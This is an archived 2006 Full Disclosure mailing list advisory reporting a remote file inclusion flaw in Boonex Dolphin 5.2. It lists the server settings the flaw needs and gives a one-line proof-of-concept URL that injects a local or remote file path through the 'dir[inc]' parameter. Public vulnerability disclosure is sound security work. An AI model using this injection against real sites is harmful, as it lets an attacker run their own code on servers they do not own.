Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Boonex Dolphin 5.2 Remote File Inclusion
From: disfigure <disfigure () gmail com>
Date: Tue, 17 Oct 2006 21:49:06 -0500

/****************************************/

http://www.w4cking.com

CREDIT:
w4ck1ng.com

PRODUCT:
Boonex Dolphin 5.2
http://www.boonex.com/products/dolphin/

VULNERABILITY:
Remote File Inclusion

NOTES:
- requires register globals on
- requires magic quotes off

POC:
<host>/<path>/templates/tmpl_dfl/scripts/index.php?dir[inc]=<local/remotefile>

ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1490

/****************************************/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Boonex Dolphin 5.2 Remote File Inclusion disfigure (Oct 18)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]